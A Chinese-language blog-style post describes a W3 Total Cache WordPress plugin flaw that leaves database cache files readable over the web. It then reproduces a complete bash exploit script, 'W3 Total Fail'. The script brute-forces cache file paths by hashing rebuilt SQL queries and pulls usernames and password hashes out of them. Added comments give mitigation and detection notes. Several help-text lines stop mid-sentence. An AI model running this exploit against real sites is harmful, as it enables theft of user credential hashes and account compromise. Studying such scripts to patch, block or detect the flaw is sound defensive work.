W3 Total Cache 相信玩 WordPress 的人都知道，是一款 WP 上非常流行的緩存插件，它可以做動態頁面緩存、CSS/JS 壓縮、資料庫緩存、CDN 加速等，類似的插件還有 WP Super Cache、DB Cache Reloaded 等等。
日前，國外黑客 Jason 在網路上公布了該款插件的漏洞：安裝該插件之後，緩存中的資料被存儲在任意使用者都可以通路的目錄，攻擊者可以利用該目錄擷取密碼 hash 值和其他的一些資料庫資訊。
W3 Total Cache 插件存儲的資料在 “/wp-content/w3tc/dbcache/” 目錄下，攻擊者可以在該目錄瀏覽和下載緩存資料。
<a href="http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh">http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh</a>
#!/bin/bash
#
# |---------------|
# | W3 Total Fail |
# | by zx2c4 |
# For more info, see built-in help text.
# This affects W3 Total Cache <= 0.9.2.4.
#
# Reviewer summary (defensive reading): this proof-of-concept demonstrates why
# the W3 Total Cache dbcache directory must never be readable over HTTP. The
# cache file name is derived solely from public inputs (host name, site id,
# user id, table prefix), so a server that serves /wp-content/w3tc/dbcache/ to
# anonymous clients exposes cached user rows, including password hashes.
# Mitigation: deny web access to the w3tc cache directory (or keep it outside
# the document root), turn off directory index listings, and run a plugin
# release newer than 0.9.2.4.
# Detection: bursts of GET requests from one client for paths of the form
# /wp-content/w3tc/dbcache/<h>/<h>/<h>/<32-hex-chars>, most of them returning
# 404, are the signature of this probe.
#
# Disable pathname expansion; the SQL text built below contains a literal '*'.
set -f
# Banner and built-in help text. The ANSI escapes only set bold/colour.
# Note that all of this is printed unconditionally, before the arguments are
# validated.
printf "\033[1m\033[31m"
echo "<===== W3 Total Fail =====>"
echo "< >"
echo "< by zx2c4 >"
echo "<=========================>"
echo
printf "\033[0m\033[1m"
echo "W3 Total Fail works by attempting to guess SQL queries that might"
echo "contain important password hashes. It walks through"
printf "\033[0m"
printf "\033[1m"
echo "until it's found the right files. If this directory has directory"
echo "index listings turned on, you might have more luck downloading the"
echo "entire folder and grepping locally for patterns, like so:"
echo " \$ grep -Ra user_pass ."
echo "If directory listings are not available, then this is the tool for"
echo "you, as it will try to brute force possible w3tc keys. It will try"
echo "25 user ids and 25 site ids. Adjust the script for more or less range."
echo "Enjoy!"
echo "- zx2c4"
echo "Dec 24, 2012"
printf "\033[0m\033[36m"
echo "Usage: $0 HOST [URLBASE] [DBPREFIX]"
echo "HOST should be the name of the host that is stored by wordpress. It"
echo "may be the actual host name of the server, or it might be something"
echo "different, depending on how wordpress is configured."
echo "Example: blog.zx2c4.com"
echo "URLBASE is the base URL of the wordpress blog which are prefixed in"
echo "DBPREFIX is the wordpress prefix used for database table names. It"
echo "is often \"wp_\", which DBPREFIX defaults to if this argument is"
echo "unspecified. Some wordpress installations will use an empty prefix,"
echo "and others use a site-specific prefix. Most, however, will use the"
echo "default."
echo "Example: wp_"
# HOST is the only mandatory argument.
if [ $# -lt 1 ]; then
echo "Error: HOST is a required argument."
exit 1
fi
host="$1"
# URLBASE defaults to plain http://HOST.
urlbase="${2:-http://$host}"
# DBPREFIX defaults to "wp_" only when fewer than three arguments are given,
# so an explicitly empty third argument yields an empty table prefix.
db_prefix="$3"
[ $# -lt 3 ] && db_prefix="wp_"
# Iterate over site ids 1..25 then 0, and user ids 1..25: one HTTP request per
# (site_id, user_id) pair, 650 in total.
for site_id in {1..25} 0; do for user_id in {1..25}; do
# Rebuild the exact SQL statement the plugin would have cached for this user.
query="SELECT * FROM ${db_prefix}users WHERE ID = '$user_id'"
# Cache key as derived here: w3tc_<host>_<site_id>_sql_<md5(query)>.
key="w3tc_${host}_${site_id}_sql_$(echo -n "$query"|md5sum|cut -d ' ' -f 1)"
# The on-disk file name is md5(key) ...
hash="$(echo -n "$key"|md5sum|cut -d ' ' -f 1)"
# ... stored under three single-character directory levels taken from the
# first three hex digits of the hash.
hash_path="${hash:0:1}/${hash:1:1}/${hash:2:1}/${hash}"
url="$urlbase/wp-content/w3tc/dbcache/$hash_path"
printf "\033[33m"
echo -n "Attempting"
printf "\033[0m"
echo " $url..."
# Fetch the candidate cache file silently (curl -s: HTTP errors and 404 bodies
# are not reported), drop the first four bytes (tail -c +5 — presumably a fixed
# header in the cache file format; confirm against the plugin), join the
# remaining lines, and print the user_login/user_pass pair from what looks
# like PHP serialize() output (s:<len>:"<value>"; fields).
# NOTE(review): the sed escapes "\+" and "\x1b" are GNU sed extensions; BSD sed
# will not match here.
curl -s "$url" | tail -c +5 | tr -d '\n' | sed -n 's/.*"user_login";s:[0-9]\+:"\([^"]*\)";s:[0-9]\+:"user_pass";s:[0-9]\+:"\([^"]*\)".*/\x1b[1m\x1b[32mUsername: \1\nPassword hash: \2\x1b[0m\n/p'
done; done